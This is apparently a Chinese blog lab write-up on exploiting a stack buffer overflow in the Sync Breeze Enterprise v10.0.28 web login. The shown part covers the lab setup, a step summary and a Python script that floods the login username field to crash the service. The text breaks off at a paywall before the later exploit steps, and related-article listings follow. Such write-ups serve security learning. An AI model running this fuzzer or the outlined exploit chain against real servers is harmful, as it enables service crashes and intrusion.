windows 32位缓冲区溢出漏洞

原创 已于 2024-05-13 18:05:55 修改 · 741 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows

于 2022-11-08 23:29:59 首次发布
本文详细介绍了一次针对SyncBreeze Enterprise v10.0.28版本的Web服务漏洞利用过程,包括溢出长度的确定、EIP寄存器偏移量定位、ESP寄存器偏移量和长度测量、jmp esp指令地址获取、坏字符排除以及最终的shellcode生成。

0x00 环境准备

  1. windows10 32位虚拟机作为目标靶机、kali作为攻击机
  2. Immunity Debugger调试工具+mona脚本、存在漏洞版本的软件Sync Breeze Enterprise v10.0.28
  3. syncbreeze 安装完后打开web服务,漏洞点在web服务上
    在这里插入图片描述

0x01 漏洞调试

1. fuzz溢出长度

已知漏洞点是在web页面的登录用户名处,首先对抓取登录的请求包,用脚本fuzz用户名长度,看多长会使服务崩溃

#!/usr/bin/python3
import socket
import time
import sys
size = 100
while(size < 2000):
  try:
    print("\nSending evil buffer with %s bytes" % size)
    inputBuffer = "A" * size
    content = "username=" + inputBuffer + "&password=A"
    buffer = "POST /login HTTP/1.1\r\n"
    buffer += "Host: 172.16.12.142\r\n"
    buffer += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\r\n"
    buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
    buffer += "Accept-Language: en-US,en;q=0.5\r\n"
    buffer += "Referer: http://172.16.12.142/login\r\n"
    buffer += "Connection: close\r\n"
    buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
    buffer += "Content-Length: "+str(len(content))+"\r\n"
    buffer += "\r\n"
    buffer += content
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("172.16.12.142", 80))
    s.send(buffer.encode())
    s.close()
    size += 100
    time.sleep(10)
  except:
    print(
最低0.47元/天 解锁文章
【二进制漏洞缓冲区溢出漏洞
weixin_46301214的博客
02-02 534
实验环境:kali (其实啥都试过,windows,ubuntu16,云服务器,效果都是一样)这一行应该就是缓冲区了,16进制的20就是十进制的32。先写一个.c文件,里面写一个不会被调用的函数。天命:好像复现成功了,又好像没有完全成功。查看main函数的反汇编代码。坏消息:没有覆盖函数入口。
【网络安全】brainpan-windows缓冲区溢出详解
kali_Ma的博客
03-14 9099
简介 渗透测试 注意: 本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。 一、前言 缓冲区溢出(buffer overflow),是针对程序设计缺陷,向程序输入缓冲区写入使之溢出的内容(通常是超过缓冲区能保存的最大数据量的数据),从而破坏程序运行、趁著中断之际并获取程序乃至系统的控制权。 项目十七:brainpan-1
Win32 缓冲区溢出实战(PDF)
10-15
Win32 缓冲区溢出实战 原文:《Intro to Win32 Exploits》 作者:Sergio Alvarez 2004.09.05 译者:cloie#ph4nt0m.org 2004.10.30 一、前序 很多次被朋友邀请写篇关于在Win32下Exploit的文章。一来是因为此类文章中关于*nix 平台比较多,而Win32相对较少;二来是因为在Win32 中写exploit有些地方可能困难一点。以下我将用一个具体的简单例子,详细分析漏洞的发现挖掘、调试以及exploit编写利用,这里选择'War-FTPdvl.65' 的一个stack缓冲区溢出漏洞。 首先,需要准备以下实战工具: python - www.python.org pyOpenSSL - http://pyopenssl.sourceforge.net/ Ollydbg - http://home.t-online.de/Ollydbg/ OllyUni by FX of Phenoelit - http://www.phenoelit.de War-Ftpd version 1.65 by jgaa - http://www.jgaa.com Fuzzer vl .0 - http://hack3rs.org/~shadown/Twister/ ( 译者注)因为pyOpenSSL可以找到针对python 2.2.x的win32编译版,所以python安装2.2.x会比较方便。
从零开始学Win32平台缓冲区溢出(Part1)
热门推荐
龙哥盟
03-18 3万+
原文:Stack Based Buffer Overflow in Win 32 Platform: The Basics 译者:鸢尾 来源:从零开始学Win32平台缓冲区溢出(Part1) 缓冲区溢出是一个常见的且大家经常耳闻的软件安全漏洞缓冲区溢出即是数据被过多的写入内存或者缓冲区,当一个缓冲区内的数据写满后,如果继续写入数据,数据就会溢出到其他缓冲区中,这将会覆盖或者说是
windows 缓冲区溢出漏洞-不安全函数
weixin_34129696的博客
05-19 159
#include<stdio.h> //#definesz1"hello" intmain(intargc,char*argv[]) { //charsz1[8]="hello"; //constchar*sz1="hello"; charsz1[8]; charsz2[8]; memset(...
Windows缓冲区溢出漏洞的利用
03-10
Windows缓冲区溢出漏洞的利用 -----论文
Win32 缓冲区溢出实战 (转)
FreeXploiT
11-03 2499
Win32 缓冲区溢出实战 --------------------------------------------------------------------------------    原文:《Intro to Win32 Exploits》作者:Sergio Alvarez 2004.09.05译者:cloie#ph4nt0m.org 2004.10.30一、前序很多次被朋友邀请写
精选资源
缓冲区溢出漏洞实验报告(附带程序源码和被攻击程序)
04-18
3.缓冲区溢出演示 4.溢出攻击结果与危害 5.防御手段 适合人群: 具备一定编程基础,作业时间不够的学生,对缓冲区溢出原理不了解的初学者 环境: IDA pro7.6, vc++ ,x32dbg。 阅读建议: 有一点 x32dbg逆向工具...
缓冲区溢出漏洞实验报告
10-15
**缓冲区溢出漏洞实验报告** 缓冲区溢出是一种常见的软件安全漏洞,主要发生在程序处理数据时,未能正确检查输入数据的长度,导致超出预定内存分配的边界,从而覆盖相邻内存区域的数据。这种漏洞常常被恶意攻击者...
精选资源
Windows缓冲区溢出保护机制及绕过技术 (2010年)
05-22
综述当前Windows平台下主要的缓冲区溢出保护机制,该保护机制的绕过技术可以提高漏洞分析与利用的成功率及操作系统的安全性。介绍当前主要的缓冲区溢出保护机制的绕过技术的发展现状。针对堆栈溢出及数据执行保护...
单片机与DSP中的寄存器溢出的问题
11-15
寄存器溢出的问题可以通过缩放输人来缓解,将输人缩放到一定程度可降低或消除寄存器溢出的概率。这种方法的缺点是实践中求解所需的缩放因子非常烦琐。测试用的输人可能并非最坏情况输入,因而可能低估所需的缩放因子。而且缩放降低了输入的精度,因而也将降低输出精度。另一种消除运行时溢出的方法是使用扩展精度的算法和寄存器。扩展精度寄存器具有额外的字长余量,从而允许最坏条件下滤波器仍能无误差地存储并保留系统状态。   克服运行时溢出危害的首选方法是求解各寄存器或状态置处的最坏情况滤波器增益。这是研究FIR时引人的最坏情况设计分析的扩展。通过将FIR的冲激响应假设为无限长,可实现FIR到IIR的转换。在FIR中
Windows缓冲区溢出初探
Amire0x的小乐园
11-07 1393
# 实验环境 kali Windows xp xp3 SLMail 5.5.0 Mail Server ImmunityDebugger_1_85_setup.exe mona.py 流程 准备 在拥有以上环境后,逐个安装,安装结束后 确认端口是否开放 检查邮件相关服务 将mona放入Immunity Debugger的根目录中的Pycommands中 在kali上ping一下邮件服务器 用nc连接一下端口,没问题 大体思路 对于未知协议 查相关RFC:有数据输入的部分 Wireshark:抓包 就
缓冲区溢出漏洞学习总结(漏洞原理及其利用方法)
IronmanJay
03-29 1万+
本文将会介绍关于缓冲区溢出类型漏洞的原理及其利用方法。因为缓冲区溢出漏洞是一个大类,这其中包含了很多种小类漏洞,故笔者专写下此篇博客,以记录自己在学习和内存相关的内容时的知识点记录以及心得体会。以下就是本篇博文的全部内容。
简单的32溢出
j_______________的博客
12-01 548
有system无binsh字符串栈溢出
【计算机系统】缓冲区溢出攻击概念、演示及防御
最新发布
obstacle19的博客
04-12 1万+
是一种常见的安全漏洞,也被称为缓冲区溢出。它发生在程序尝试向缓冲区写入数据时,。这种溢出可能破坏程序的堆栈,使程序转而执行其它指令,从而达到攻击的目的。缓冲区溢出攻击的原理主要是利用程序中存在的缓冲区溢出漏洞。当程序没有仔细检查用户输入的参数时,攻击者可以通过输入超出缓冲区边界的恶意数据来破坏程序的正常执行流程。这些数据可以,导致程序。例如,在一个简单的C语言程序中,如果程序使用固定大小的缓冲区来接收用户输入,而攻击者输入的数据超过该缓冲区的容量,就会发生缓冲区溢出
关于32计数器溢出问题
科学边界
03-29 6901
好久没写博客了,昨天遇到一个时间计数溢出问题, 做个简单记录吧 背景:底层提供一个unsigned int的变量表示自开机以来累计时间,用作码流的时间戳,单ms. 问题:32无符号数的毫秒计数,大概49天就会溢出溢出后时间计数用作时间戳就会出错,导致无法正确解码。 为解决这一问题,用一个64变量来保存累计时间, 方法如下:
32溢出exp
weixin_44932880的博客
10-13 667
32程序 栈传参 栈结构 High Address | | +-----------------+ | args | +-----------------+ | return address | +-----------------+ ebp
关于32Linux系统内存溢出问题的情况及几种常见解决方法
※belief※的博客
04-27 2682
由于近期Xenserver系统的OOMkill引起的批量虚拟机hang死以及刀片宕机重启问题,所以针对Out of memory 问题进行了了解和熟悉。 根据查阅网上一些文档LINUX系统具有OOMKiller的保护机制,用于避免 Linux 在内存不足的时候不至于出太严重的问题,把一些无关紧要的进程杀掉,以保证系统的正常运行。   内存是通过指针寻址的,因而CPU的字长决定了CPU所能管理
Win32漏洞分析与利用 栈缓冲区溢出实验总结
Tracy_yi的博客
05-30 1673
溢出 如果程序在处理用户数据时,未能对其大小进行恰当的限制,在进行复制、填充时没对这些数据限定边界,攻击者就可以通过精心设计的数据进行溢出覆盖,修改内存中数据、改变程序的执行流程。 在栈溢出漏洞中,最经典的是借助跳板的栈溢出方式。 左图是一个正常的栈,从高到低依次是:父函数的栈空间、作为返回地址的EIP、保存下来的栈指针EBP、若干局部变量和用于被攻击的缓冲区。 现有的C语言中许多标准函数(如strcpy)在现在看来已经不再是安全的了,利用strcpy讲数据复制到局部数组缓冲区时可以超过缓冲区区域,覆盖
缓冲区溢出漏洞研究:挖掘分析与利用技术
"本文深入研究了缓冲区溢出漏洞的挖掘分析及利用,旨在提升系统软件的安全性。作者提出了一种结合动态与静态分析的方法,并在Windows平台上开发了名为VulAs的漏洞挖掘分析系统,以协助该领域的研究工作。" 在计算机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值